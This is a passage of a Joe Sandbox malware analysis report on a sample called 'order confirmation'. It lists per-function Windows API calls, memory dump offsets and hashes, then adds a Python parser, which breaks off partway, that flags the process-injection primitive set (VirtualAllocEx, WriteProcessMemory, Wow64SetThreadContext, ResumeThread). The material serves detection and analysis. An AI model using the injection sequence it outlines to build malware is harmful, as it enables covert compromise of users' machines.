                                                    • Opcode Fuzzy Hash: 0a81ea3aef92d40baf5104cf185662a819bb7e94cbfd9a4a4f82a4d840cd550e
                                                    • Instruction Fuzzy Hash: 8B2149B1D056589BEB18CF67C8543EEFBF6EF8A300F04C16AD409A6254DB740945CF91

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D3BE
                                                    • GetCurrentThread.KERNEL32 ref: 0174D3FB
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D438
                                                    • GetCurrentThreadId.KERNEL32 ref: 0174D491
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 59469d536df92a0c22aa75a58e2c83399ba257e202994114e2a8343abc63a130
                                                    • Instruction ID: d3abc2d482107686b9c946c1ad59484737640516a4adba2caf87d994981a5b18
                                                    • Opcode Fuzzy Hash: 59469d536df92a0c22aa75a58e2c83399ba257e202994114e2a8343abc63a130
                                                    • Instruction Fuzzy Hash: 6C5167B09003498FEB18DFA9D448BDEBBF1BF88314F208459E419A73A0DB746948CF65

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D3BE
                                                    • GetCurrentThread.KERNEL32 ref: 0174D3FB
                                                    • GetCurrentProcess.KERNEL32 ref: 0174D438
                                                    • GetCurrentThreadId.KERNEL32 ref: 0174D491
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 48931b2c804f7989716dba1a536a3cb54fa972d36e7c11118f8bc104010f6823
                                                    • Instruction ID: 3edc2a6b5e33555b3c08f60409079c76d5c7c486fba20bfad1654fb26f144350
                                                    • Opcode Fuzzy Hash: 48931b2c804f7989716dba1a536a3cb54fa972d36e7c11118f8bc104010f6823
                                                    • Instruction Fuzzy Hash: EB5158B09017498FEB18DFAAD448BDEBBF1BF88314F208419E419A7360DB746948CF65

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D8EACE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: f833f81048822a10cd5d41a4363e23d4a31a255d37405b9e232c8023e8522921
                                                    • Instruction ID: 5db46f00b8e31f160f24e196d4a7381d4b339d4b62fc6f7fc97eebedb68e2cd3
                                                    • Opcode Fuzzy Hash: f833f81048822a10cd5d41a4363e23d4a31a255d37405b9e232c8023e8522921
                                                    • Instruction Fuzzy Hash: B8A14CB1D0021ADFEB60EF65C841BDDFBB2BF44710F1485A9D849A7280DB749985CF91

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D8EACE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: f93ff18ee7ca7b010ffaec429f5b04e87c2011eb711fe5f9477cba701cc58d48
                                                    • Instruction ID: a2f09d8fc171d62410f8a35b7220509ec3c63473153ce1a558e76017fc8dd48c
                                                    • Opcode Fuzzy Hash: f93ff18ee7ca7b010ffaec429f5b04e87c2011eb711fe5f9477cba701cc58d48
                                                    • Instruction Fuzzy Hash: F7914CB1D0021ADFEB60EF69C8417DDFBB2BF44710F148569D849A7280DB749985CF91

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0174B2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 140d27de1a85a941b8a11ea4954b5909ba9e95468bc6dc77383bc3b840082509
                                                    • Instruction ID: 6583a04ca5da22e7edb23b4e110e3326acdd3ac709162ed70bad32dd4f655e2e
                                                    • Opcode Fuzzy Hash: 140d27de1a85a941b8a11ea4954b5909ba9e95468bc6dc77383bc3b840082509
                                                    • Instruction Fuzzy Hash: DF711370A00B058FEB25DF6AD44475AFBF1FF88200F008A2DD48AD7A54DB75E949CB91

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 017459A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 26f3b6f403d41be962d102f6280803487e768b5865c95d369f76e7d4bf208399
                                                    • Instruction ID: 27ed9452666aa48cbb3e23a010d40f80b420534a383afb807826bdc44fdcc7a9
                                                    • Opcode Fuzzy Hash: 26f3b6f403d41be962d102f6280803487e768b5865c95d369f76e7d4bf208399
                                                    • Instruction Fuzzy Hash: 5641F1B1D00319CFEB24DFA9C884BCEBBB6BF89704F20816AD408AB251DB756945CF50

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 017459A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: aee81c8d6260130adf28514b226520aea56fc5cb61601bea5350d1fa8d53634b
                                                    • Instruction ID: 7077299c384e1fdee800dd4a7d3aa718b0a80f0525e029a74bf8214d90e8573a
                                                    • Opcode Fuzzy Hash: aee81c8d6260130adf28514b226520aea56fc5cb61601bea5350d1fa8d53634b
                                                    • Instruction Fuzzy Hash: 7B41C0B1D0071DCFEB24DFAAC88479EBBB5BF89704F20816AD408AB251DB756945CF90

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: a766ab73c94cca85b9be95bc857985ba240843409da3ba38b3b3c80531ef89e3
                                                    • Instruction ID: d07eb3992ac51683ed9a9dc7f1c0cde341e7b0c5a4205992d645d975ca6a8089
                                                    • Opcode Fuzzy Hash: a766ab73c94cca85b9be95bc857985ba240843409da3ba38b3b3c80531ef89e3
                                                    • Instruction Fuzzy Hash: B9318A71804389EFCF11DFA9D840ADEBFF8EB49311F14846AE554AB251C3359854DBA1

                                                    Control-flow Graph

                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07D9CA47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: a90f81e5a7f13e9941e6748aaf16f02d140a5d03018b730c6746bfd1ce0da4e2
                                                    • Instruction ID: bdb65c4bd2a5f5770f3a81f8908b2143d585ddfe8aa6c0309cf5b6a272f87d6d
                                                    • Opcode Fuzzy Hash: a90f81e5a7f13e9941e6748aaf16f02d140a5d03018b730c6746bfd1ce0da4e2
                                                    • Instruction Fuzzy Hash: 6331E3B5D103499FDF10CFAAD980ADEFBF5BB48220F14842AE918A7350C774A940CFA0

                                                    Control-flow Graph

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D8E6A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ac6c6cc8610e78f14b5f096efbe33d091e38ca66d2db0bbf8999f2334c7ac116
                                                    • Instruction ID: bc5020dfd896444d9b473d426b21dbb09255fcada03757fc957f0e54b83c1cc1
                                                    • Opcode Fuzzy Hash: ac6c6cc8610e78f14b5f096efbe33d091e38ca66d2db0bbf8999f2334c7ac116
                                                    • Instruction Fuzzy Hash: 462106B19103499FDB54DFAAC881BEEBBF5BF88310F10882AE919A7250C7789544CF60

                                                    Control-flow Graph

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D8E6A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 3f91a3b606f90ce4024308379a2d6ac9568a29427410d302113f8e1a960dc83b
                                                    • Instruction ID: cf8307fa8816baa4e1164210a4c44cbc475a68ff793a24b088663af272efde8b
                                                    • Opcode Fuzzy Hash: 3f91a3b606f90ce4024308379a2d6ac9568a29427410d302113f8e1a960dc83b
                                                    • Instruction Fuzzy Hash: D62117B19003499FDB10DFAAC881BDEBBF5BF88310F108829E918A7240C7789544CBA4

                                                    Control-flow Graph

                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07D9CA47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: a997ad3fa42f351cceec5ccfe084154565e166da890534f1774b0a14cbdb7c38
                                                    • Instruction ID: 81012d2cabcf10ae19e692bb7f4bf2a8c7ce1ffa2c7ef20a55919a401baf717f
                                                    • Opcode Fuzzy Hash: a997ad3fa42f351cceec5ccfe084154565e166da890534f1774b0a14cbdb7c38
                                                    • Instruction Fuzzy Hash: 9921C3B5D103499FDB10CFAAD980A9EFBF5BB48220F14842AE919A7250D774A944CFA0

                                                    Control-flow Graph

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D8E780
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 27dacb85f7c280169f462fc86ef807e8311134528f9545d70e8cea52715c94be
                                                    • Instruction ID: 5129e676c00ec4e998231e44359b25c5e4507842c7c62839e3e4d4dba2bb375c
                                                    • Opcode Fuzzy Hash: 27dacb85f7c280169f462fc86ef807e8311134528f9545d70e8cea52715c94be
                                                    • Instruction Fuzzy Hash: 3D2126B18007499FDB10DFAAC881AEEBBF5BF88310F10842AE959A7250C73995409F60

                                                    Control-flow Graph

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D8E0BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: fd9879a2e53e0e5fbaf7a06980ebd3f9fe078914ddb77f7393ba410d3bc60956
                                                    • Instruction ID: 442abf0a6273bc740c592c75b2448fece7955dd9f3685e073fbf69881682c585
                                                    • Opcode Fuzzy Hash: fd9879a2e53e0e5fbaf7a06980ebd3f9fe078914ddb77f7393ba410d3bc60956
                                                    • Instruction Fuzzy Hash: EF2128B1D003099FDB54DFAAC4857EEBBF4AF88314F24882AD519A7240CB789945CF64
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D8E780
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 35481383227f373eff04524e1201a00fa499c57025ca456484373e78d4e2e4bc
                                                    • Instruction ID: 96bf4f874ef3db260a57b03f31315c7cad3f60a0f3abb7e7c83a77ac5907097e
                                                    • Opcode Fuzzy Hash: 35481383227f373eff04524e1201a00fa499c57025ca456484373e78d4e2e4bc
                                                    • Instruction Fuzzy Hash: 5D21E6B18003599FDB10DFAAC881BEEFBF5FF48310F548429E959A7240C7799544DBA4

                                                    Control-flow Graph

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D8E0BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 7fde7b11218dc541937ad1fd11f7b8294b70fd73b9f49cac89bad091fe745419
                                                    • Instruction ID: 8dcaa2f6a805d4b103f4af594e6a6d1a05b817f9a02d376b5b2574c2daa6b61f
                                                    • Opcode Fuzzy Hash: 7fde7b11218dc541937ad1fd11f7b8294b70fd73b9f49cac89bad091fe745419
                                                    • Instruction Fuzzy Hash: 7C2118B19003099FDB50DFAAC4857AEFBF4EF88324F148829D559A7240CB789945CFA5
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0174D60F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 91bce8233e0b7dadc1c4c4ec9ca75ddf45b893d87c8229991fd6cc1ddff25f8b
                                                    • Instruction ID: da16a530bdbe63cfa5a43cd91e996fac40e1af934b57c0df433d82081d904d39
                                                    • Opcode Fuzzy Hash: 91bce8233e0b7dadc1c4c4ec9ca75ddf45b893d87c8229991fd6cc1ddff25f8b
                                                    • Instruction Fuzzy Hash: 5D21C4B59002499FDB10CFAAD884ADEFBF9FB48310F14841AE958A3350D778A954CF65
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0174D60F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 4f6f4665f19f5fb623f2a62a885742f9f120b8258661e036ce39a8729a588bcc
                                                    • Instruction ID: f3aa848aa2a1e58c0bd56a69d0ccdf2680efd4e5ff2689f5a6bef60c80bde2ae
                                                    • Opcode Fuzzy Hash: 4f6f4665f19f5fb623f2a62a885742f9f120b8258661e036ce39a8729a588bcc
                                                    • Instruction Fuzzy Hash: 6921E2B59002499FDB10CFAAD984ADEFBF5FB48310F14842AE958A3350D378A950CF65
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D8E5BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 5101ef41fff833ffba371422e962c49a9b7dd9fd04d71d6aab7fc1f49a9839a5
                                                    • Instruction ID: a8ca5eccd3bb3f65840a1f02da43daa3fa161dc376d3118fe03cc5c6073c6b46
                                                    • Opcode Fuzzy Hash: 5101ef41fff833ffba371422e962c49a9b7dd9fd04d71d6aab7fc1f49a9839a5
                                                    • Instruction Fuzzy Hash: 5C1129719003499FDF24DFAAC845BEEBBF5EF88310F24881AE915A7250CB759540CF90
                                                    APIs
                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07D93482,?,?,?,?,?), ref: 07D93527
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: c569804eeb4e67fb3175bdbdf7b390b072d33d04773a8f502a9d51d8e42f605f
                                                    • Instruction ID: 723528efcb3819de1dc836e2cd605fd405745aae57033ae5d2c1450493d60e7c
                                                    • Opcode Fuzzy Hash: c569804eeb4e67fb3175bdbdf7b390b072d33d04773a8f502a9d51d8e42f605f
                                                    • Instruction Fuzzy Hash: 6F1114B580034DAFDB10DFAAD844BDEBFF8EB48320F14841AE954A7250C379A954CFA5
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D8E5BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 2eb4a1398b3aa51b06d592b7ca19e30839a62ff444dca4a0d4b75644067cc53c
                                                    • Instruction ID: 5873db047ae8448f3f2c0cfab6087c4e825b31ab51f1ab90a7d481539baff5b4
                                                    • Opcode Fuzzy Hash: 2eb4a1398b3aa51b06d592b7ca19e30839a62ff444dca4a0d4b75644067cc53c
                                                    • Instruction Fuzzy Hash: D51126719003499FDB10DFAAC844BDEBBF5AF88320F148819E519A7250CB759540CFA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: bfd74862d07a0822faddd87ac36e8b6935e15e08267d932023d9d1a758400ba0
                                                    • Instruction ID: d42e733e51d39b5f62e446c4d44af880bd48304ff56e45c720bad7db6035e866
                                                    • Opcode Fuzzy Hash: bfd74862d07a0822faddd87ac36e8b6935e15e08267d932023d9d1a758400ba0
                                                    • Instruction Fuzzy Hash: 81113AB1D007898FDB24DFAAC44579EFBF5EF88220F148819D519B7240CB759544CF94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 72713a861a32304b3ee4ed06a713a12688a4d159cad24e5c87ebf36c504dd127
                                                    • Instruction ID: 92c6ed40a5c0d82a896e1fe8e5c258af92c49ecbda1e6fe0f7ff715f545feb5c
                                                    • Opcode Fuzzy Hash: 72713a861a32304b3ee4ed06a713a12688a4d159cad24e5c87ebf36c504dd127
                                                    • Instruction Fuzzy Hash: 58113AB1D007498FDB20DFAAC44579EFBF5EF88620F148819D519B7240CB756544CFA4
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0174B2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 83d599c1c9f4068c30c2029b6ab186051f4ececb977a8eae4cbf974fa539b1a9
                                                    • Instruction ID: f2c8e45ff1d57f24b571feeba151a3c5846eabd9e3d9ddbc073273e2f64e4c20
                                                    • Opcode Fuzzy Hash: 83d599c1c9f4068c30c2029b6ab186051f4ececb977a8eae4cbf974fa539b1a9
                                                    • Instruction Fuzzy Hash: 3F110FB5C002498FDB20CF9AC444A9EFBF4EF88224F10842AD819A7600C379A545CFA1
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0826131D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669817607.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_8260000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: b0f41d83410b97a2726d547ad7609a9ae634e7f05e6088eec66de815b6b081aa
                                                    • Instruction ID: 7f4a4656a7ed9921e208732ea99c3032fd3304fab0afbba4b0cab76af3f11184
                                                    • Opcode Fuzzy Hash: b0f41d83410b97a2726d547ad7609a9ae634e7f05e6088eec66de815b6b081aa
                                                    • Instruction Fuzzy Hash: 051122B58003498FDB10CF9AC985BDEBBF8FB48320F20840AD518A3600C378A554CFA0
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0826131D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669817607.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_8260000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 8332d1538b3bf968c0ee46d0874a4334f5fe30e90fa6b1e02411246236409e44
                                                    • Instruction ID: 2e234af46e6ad5252a9268ab53f8d026d3c45c015785f40aac3d56810a547844
                                                    • Opcode Fuzzy Hash: 8332d1538b3bf968c0ee46d0874a4334f5fe30e90fa6b1e02411246236409e44
                                                    • Instruction Fuzzy Hash: 7D11E5B58003499FDB10DF9AD885BDEFBF8FB48320F108419E559A7640C375A554CFA5
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07D954C9,?,?), ref: 07D95A78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: f897e4203554c5e6aa01012c0fddf07377478b43305100580ce6c5a1e248ebd3
                                                    • Instruction ID: 365549069cf24b93da22a96b8382e4ffe1f43a4b9b1f8774cd9df432f3a71df9
                                                    • Opcode Fuzzy Hash: f897e4203554c5e6aa01012c0fddf07377478b43305100580ce6c5a1e248ebd3
                                                    • Instruction Fuzzy Hash: 0C1143B18003499FDB20DF9AD584BDEBBF4EB48220F108429E959A7280C738A944CFA5
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07D954C9,?,?), ref: 07D95A78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 8dd33d3b6ee815d8fca9d844e1c6393437f8e66e49e837b853c79708cc317b5b
                                                    • Instruction ID: b07c87c41e5b793c938b72611db264877ee4cfd28cc71b0c0a84f834b5e0594e
                                                    • Opcode Fuzzy Hash: 8dd33d3b6ee815d8fca9d844e1c6393437f8e66e49e837b853c79708cc317b5b
                                                    • Instruction Fuzzy Hash: 461125B58003499FDB10DF9AD584BDEBBF4EB48320F10856AD558A7240D778A544CFA5
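The records above list, per function, the API it calls and the memory dump region it was lifted from. Read together, the functions in the 07D80000 region (ReadProcessMemory, VirtualAllocEx, Wow64SetThreadContext, ResumeThread) are the primitive set behind the report's thread-injection signatures. The parser below is an added example, not part of the Joe Sandbox report or its tooling: it reads records in this format, groups the called APIs by dump offset, and flags a region when the remote-allocate, set-thread-context and resume-thread primitives all occur there. The stage names, the CORE set and the function names are the example's own; the sample records are copied from the report with their hash lines shortened. Co-location in one dump region is a static heuristic: it does not establish call order, which only the sandbox's runtime trace (the signatures in the report header) can.

```python
"""Parse the per-function records of a Joe Sandbox report (the 'APIs',
'Memory Dump Source' and 'Similarity' blocks) and flag memory-dump regions
whose functions, taken together, cover the process-injection primitives."""
import re
from collections import defaultdict

# Report lines carry a "• " bullet; the patterns tolerate it being absent.
_API_CALL = re.compile(r"^•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
_SOURCE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
_API_ID = re.compile(r"^•?\s*API ID:\s*(\S*)$")
_RECORD_END = re.compile(r"^•?\s*Instruction Fuzzy Hash:")

# Stage names are this example's own; each set holds the Win32 API the report
# lists plus the Nt* call that implements the same primitive.
STAGES = {
    "read_remote": {"ReadProcessMemory", "NtReadVirtualMemory"},
    "alloc_remote": {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write_remote": {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "set_context": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume_thread": {"ResumeThread", "NtResumeThread"},
}
ALL_APIS = set().union(*STAGES.values())
# Remote alloc + thread-context rewrite + resume is the core of thread
# hijacking / hollowing, the behaviour behind the report's "Modifies the
# context of a thread in another process" signature.
CORE = {"alloc_remote", "set_context", "resume_thread"}


def parse_records(text):
    """Yield one dict per function record; a record ends at its 'Instruction
    Fuzzy Hash' line and is dropped if it carries no dump source."""
    rec = {"offset": None, "pe_backed": None, "calls": [], "api_id": ""}
    for raw in text.splitlines():
        line = raw.strip()
        if m := _API_CALL.match(line):
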